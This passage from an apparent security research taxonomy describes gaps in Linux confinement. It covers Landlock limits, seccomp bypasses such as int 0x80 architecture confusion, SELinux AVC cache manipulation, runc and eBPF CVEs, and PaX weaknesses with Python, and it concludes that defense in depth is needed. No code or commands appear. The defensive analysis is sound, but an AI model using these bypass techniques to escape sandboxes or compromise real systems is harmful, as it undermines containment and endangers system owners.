Landlock LSM has documented limitations. It cannot restrict chdir(2), stat(2), flock(2), chmod(2), chown(2), setxattr(2), utime(2), fcntl(2), or access(2), and ioctl(2) on device files became restrictable only with ABI v5 (kernel 6.10). A sandboxed process can enumerate the filesystem via stat() and change working directories freely. Network restrictions were absent before ABI v4 (kernel 6.7), and abstract Unix socket scoping was added only in ABI v6 (kernel 6.12). Landlock’s 16-layer stacking limit can be exhausted in deeply nested sandbox environments.

seccomp bypass techniques beyond io_uring include:

  • Architecture confusion: On x86-64, using int 0x80 to invoke 32-bit syscall ABI where syscall numbers map differently, bypassing filters that don’t check the seccomp_data.arch field
  • SECCOMP_RET_USER_NOTIF TOCTOU: The kernel documentation explicitly warns this mechanism “can NOT be used to implement a security policy” due to inherent race conditions between argument inspection and syscall execution
  • Creative syscall chaining: When read() is blocked, mmap(MAP_POPULATE), sendfile(), splice(), copy_file_range(), and process_vm_readv() provide alternative data access paths

SELinux escapes include AVC cache manipulation (overwriting state->initialized to false bypasses all permission checks), io_setup() bypassing PROCESS__EXECMEM restrictions (CVE-2016-10044), and ioctl whitelisting gaps: the SELinux reference policy still doesn’t whitelist ioctls (GitHub issue #76), meaning any process allowed ioctl can issue any ioctl command.

Container escapes with recent CVEs include CVE-2024-21626 (runc FD leak, 80% of cloud environments vulnerable per Wiz), CVE-2025-31133 (runc symlink during container creation), and CVE-2022-0492 (cgroup release_agent, blocked by SELinux). eBPF exploitation provides local privilege escalation via verifier bugs (CVE-2020-8835, CVE-2022-23222, CVE-2025-0009), mitigated by kernel.unprivileged_bpf_disabled=1.

PaX/grsecurity on Gentoo provides MPROTECT (strict W^X), enhanced ASLR (RANDMMAP with 33+ bits entropy), and RAP (control-flow integrity). However, Python requires MPROTECT exceptions because libffi uses RWX trampolines for ctypes/cffi—either EMUTRAMP must be enabled or MPROTECT disabled on the Python binary, significantly reducing effective protection. Data-only attacks, bytecode manipulation, and /proc/self/mem writes remain viable under full PaX enforcement.


Conclusion

Three structural insights emerge from this taxonomy. First, installation time is the critical vulnerability—setup.py execution, PEP 517 build backends, and even metadata extraction trigger arbitrary code, and a single source distribution anywhere in the dependency graph is sufficient. Any confinement architecture must treat installation as an untrusted operation requiring full sandboxing. Second, the Python interpreter itself undermines OS-level protections: ctypes provides unrestricted memory access, /proc/self/mem bypasses page permissions, id() leaks ASLR information by design, and libffi’s trampoline mechanism conflicts with W^X enforcement. Confinement must account for Python’s privileged relationship with the underlying system. Third, attack sophistication is escalating rapidly: from simple typosquats in 2022 to CI/CD pipeline injection (Ultralytics), compiled bytecode evasion (fshec2), steganographic payloads in images, and year-long sleeper packages (JarkaStealer). The io_uring bypass of both seccomp and LSM hooks, combined with Landlock’s documented syscall gaps and SELinux’s ioctl whitelisting deficiencies, means no single Linux security mechanism provides complete confinement—effective defense requires defense in depth across all 11 categories documented here.
